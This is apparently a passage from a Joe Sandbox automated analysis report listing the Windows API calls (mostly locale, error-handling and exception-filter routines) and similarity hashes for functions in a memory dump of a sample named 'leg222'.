                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00AC2DCD,00000002,00000000,?,?,?,00AC2DCD,?,00000000), ref: 00AC2B48
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00AC2DCD,00000002,00000000,?,?,?,00AC2DCD,?,00000000), ref: 00AC2B71
                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,00AC2DCD,?,00000000), ref: 00AC2B86
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                          • Opcode ID: ac0ce2973c66dcbc938e654a85bf1d73dfa68a2a3c02c6a4bc29a346ac4d6d2c
                                                                                                                                                                                                                                          • Instruction ID: 9f738fb34976c1acf5633b9ae697f20d70c947a02e378aaf86455f6ccf56f10c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac0ce2973c66dcbc938e654a85bf1d73dfa68a2a3c02c6a4bc29a346ac4d6d2c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B21BE72600205AADB38DF69C901FA773A6FF54FA0B17852CE90ADB111EB32ED41C390
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00AC2D90
                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00AC2DD9
                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00AC2DE8
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00AC2E30
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00AC2E4F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 415426439-0
                                                                                                                                                                                                                                          • Opcode ID: 23e31e6de8d3a1624e67d8f0d992b30b25a29056c91609aa1be5e9b2b484ab6e
                                                                                                                                                                                                                                          • Instruction ID: b7d65fe0223fe321e1bd75fc9ec077b9f93ce497048affc21f3a3d7160882866
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23e31e6de8d3a1624e67d8f0d992b30b25a29056c91609aa1be5e9b2b484ab6e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A514C71A00609AFDF11EFA5CD45FAE77B8BF28700F16452DA902E7191EB7099008B61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,00AB73AD,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00AC23E1
                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00AB73AD,?,?,?,00000055,?,-00000050,?,?), ref: 00AC240C
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00AC256F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                          • API String ID: 607553120-905460609
                                                                                                                                                                                                                                          • Opcode ID: ae72e2c5bb2daa9ca504c12a18a3ce1a9527ea705e33aba3dac951a9cf9e54b5
                                                                                                                                                                                                                                          • Instruction ID: d2842c6d18c601571c86686f27c51ae7291fdf31a20fbba8ad22cfc14e0bd9c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae72e2c5bb2daa9ca504c12a18a3ce1a9527ea705e33aba3dac951a9cf9e54b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A571D371A00606ABDB28AB75CD46FBB77ACEF45700F16442EF506DB182EB78E941C760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                          • Opcode ID: adabab75f0cd4e4127e2d25f40a6035a1c11768978d09e5fd8cbb18de81cc5b4
                                                                                                                                                                                                                                          • Instruction ID: a2b8fcf069f21e3ed9de88304517daeadf18bd5d347b00a5743e07f3c0cd02c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adabab75f0cd4e4127e2d25f40a6035a1c11768978d09e5fd8cbb18de81cc5b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89B147329042459FDB15CF28C891BFEBBB9EF69350F15826AE905AB343D235DD01CBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AAB746
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00AAB812
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AAB82B
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00AAB835
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                          • Opcode ID: d87ba596dcfb85744863a449fd760693ead0bfacacca73314b209237adb57097
                                                                                                                                                                                                                                          • Instruction ID: 8773833251e5050e5647e1e5a285c5c92eaebf632ddf75313ba225a165f97e80
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d87ba596dcfb85744863a449fd760693ead0bfacacca73314b209237adb57097
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56312775D0131CDBDB20DFA4D949BCDBBB8BF08300F1041AAE40CAB291EB759A858F45
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • OffsetRect.USER32(00000000,00000000,00000000), ref: 00AC910C
                                                                                                                                                                                                                                            • Part of subcall function 00AA6510: std::_Lockit::_Lockit.LIBCPMT ref: 00AA6520
                                                                                                                                                                                                                                            • Part of subcall function 00AA6510: std::_Lockit::_Lockit.LIBCPMT ref: 00AA653A
                                                                                                                                                                                                                                            • Part of subcall function 00AA6510: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA655B
                                                                                                                                                                                                                                            • Part of subcall function 00AA6510: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA658A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$OffsetRect
                                                                                                                                                                                                                                          • String ID: 0$Zatlat
                                                                                                                                                                                                                                          • API String ID: 3869574668-1547964091
                                                                                                                                                                                                                                          • Opcode ID: 9670ec1876c801b53e4281039e47e45e4ab312026eec9a4720b80218da466dc1
                                                                                                                                                                                                                                          • Instruction ID: 70e14d98b1992477ba0b459c683444e7d9697799bd859b72c982c3205582c149
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9670ec1876c801b53e4281039e47e45e4ab312026eec9a4720b80218da466dc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49D1AB716083809FE305DF28C999B6BBBE1AFC9308F15092DF4958B3A2D775D845CB92
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC2787
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC27D1
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC2897
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 661929714-0
                                                                                                                                                                                                                                          • Opcode ID: 58105d084d0629a86846e9832206570e13024afc4532d029d6ff0f7e39bf7ea7
                                                                                                                                                                                                                                          • Instruction ID: e0c9564781bdf3f293cd4b9321e1ee9228a75782e3a47a4a9d4a8ebe584a76ae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58105d084d0629a86846e9832206570e13024afc4532d029d6ff0f7e39bf7ea7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 776169759102179FEB28DF29CD82FBAB7A8EF04300F1580BDE915D6185EB78E985CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000010), ref: 00AB2DBB
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 00AB2DC5
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00AD3748,?,?,?,?,?,00000010), ref: 00AB2DD2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                          • Opcode ID: 041ebe405d9ad90f1fd93e6a10fab42690f5ae0e54eff5065bbae5df231040c4
                                                                                                                                                                                                                                          • Instruction ID: 111acacb5a5fd0ba1cc0cfe43b4203ee07f1ae5fbd3ea82a7c3b741718a2c0ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 041ebe405d9ad90f1fd93e6a10fab42690f5ae0e54eff5065bbae5df231040c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8331D47490121C9BCB21DF68DD88BDCBBB8BF18310F5041EAE41CA7291EB749B858F45
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 23d608ebba7789104410d6c6982011dd5f20ec20b495657e356f27138eb28116
                                                                                                                                                                                                                                          • Instruction ID: 0ae122e3a3b20d4ff5dfa7e608d35a7f112cd33309ea08c7b7eded9493033ba6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23d608ebba7789104410d6c6982011dd5f20ec20b495657e356f27138eb28116
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5741A575C0521DAEDF20DF79CC89AEABBBCAF45304F1842E9E459D3202DA359E858F50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC29DA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                          • Opcode ID: 1c89719a6a4f8452a16fe521a66632868412371b6a1eacdc538c8605e714ece5
                                                                                                                                                                                                                                          • Instruction ID: dba522015469bda767c85da9a7f27683c11c2e4c8aea40355c78bff743ea6488
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c89719a6a4f8452a16fe521a66632868412371b6a1eacdc538c8605e714ece5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1421BE72610206ABDF28DB25CD42FBA73ACEF04350F11007EF902D6152EB34ED018B50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00AC2733,00000001,00000000,?,-00000050,?,00AC2D64,00000000,?,?,?,00000055,?), ref: 00AC267F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                          • Opcode ID: beee890e9f43970ea6f9ce0e4606b7cfabb1ac5381d155987d226775a5f48e3f
                                                                                                                                                                                                                                          • Instruction ID: 59be521444183ba260853b1571f42bea2ca4cd20004de21f8cff45425dfee765
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: beee890e9f43970ea6f9ce0e4606b7cfabb1ac5381d155987d226775a5f48e3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4110C3B6047059FDB189F39C8D5BBABB92FF84358B16442CE98647A40D7717943C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00AC294F,00000000,00000000,?), ref: 00AC2BE1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                          • Opcode ID: f444a6ff521a5b6e35fbb7a0325c96786aba3884bb6c609a214dd7a76b4819a4
                                                                                                                                                                                                                                          • Instruction ID: 6ec9bcd7b716df4d47946b1b5dddc0e6e060a18bf69f734cf7bec1256291b4a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f444a6ff521a5b6e35fbb7a0325c96786aba3884bb6c609a214dd7a76b4819a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0F08636904216ABDB289B65CC46FFE7B68EB40754F16443CED15A3140EA74FD81C7E0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00AC256F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                          • API String ID: 3736152602-905460609
                                                                                                                                                                                                                                          • Opcode ID: 9e5baa4925b61c52ea2f45e374834e9a3abeafcd3a2f2e93bb6c75016cb63330
                                                                                                                                                                                                                                          • Instruction ID: bc5a8f1268a34c1c0cc89d13fcc7a6b735f85638be25edc72b6a6b6059d48eae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e5baa4925b61c52ea2f45e374834e9a3abeafcd3a2f2e93bb6c75016cb63330
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF02832A10109ABC714EB78DD56FFB33ECDB45314F01407DB602E7281EA78AD058790
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00AC2986,00000001,?,?,-00000050,?,00AC2D28,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00AC26F2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                          • String ID:
